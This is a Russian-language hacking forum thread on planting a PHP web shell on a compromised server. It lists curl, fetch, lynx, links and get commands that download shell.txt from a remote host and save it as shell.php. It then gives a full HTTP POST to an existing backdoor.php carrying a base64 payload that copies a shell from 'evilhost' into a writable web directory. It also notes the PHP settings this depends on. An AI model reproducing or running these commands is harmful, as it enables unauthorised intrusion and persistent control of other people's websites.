Сообщение от
noviyuser
какие еще команды есть напободие wget?
curl, fetch, links, lynx, get
Проверить наличие качалок можно команой which.
В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу на сервере)
Синтаксис:
get -o /path/shell.php http://site.com/shell.txt
fetch -o /path/shell.php http://site.com/shell.txt
curl --output /path/shell.php http://site.com/shell.txt
links -source http://site.com/shell.txt > /path/shell.php
lynx -source http://site.com/shell.txt > /path/shell.php
Сообщение от
None
можно ли этой командой залить полноценный шелл? можно примерчик?
Можно, зависит от настроек php.
Пример для allow_url_fopen = on (ну и функция copy разумеется не должна находиться в disable functions)
Посылаешь пакет:
Код HTML:
POST http://site.com/backdoor.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Keep-Alive: 115
Connection: keep-alive
e=Y29weSgnaHR0cDovL2V2aWxob3N0L3NoZWxsLnR4dCcsJy9zaXRlL3d3dy9zaGVsbC5waHAnKTs
где e=copy('http://evilhost/shell.txt','/site/www/shell.php'); в base64_encode
http://evilhost/shell.txt - откуда льем
/site/www/shell.php - куда (абсолютный путь до папки доступной на запись)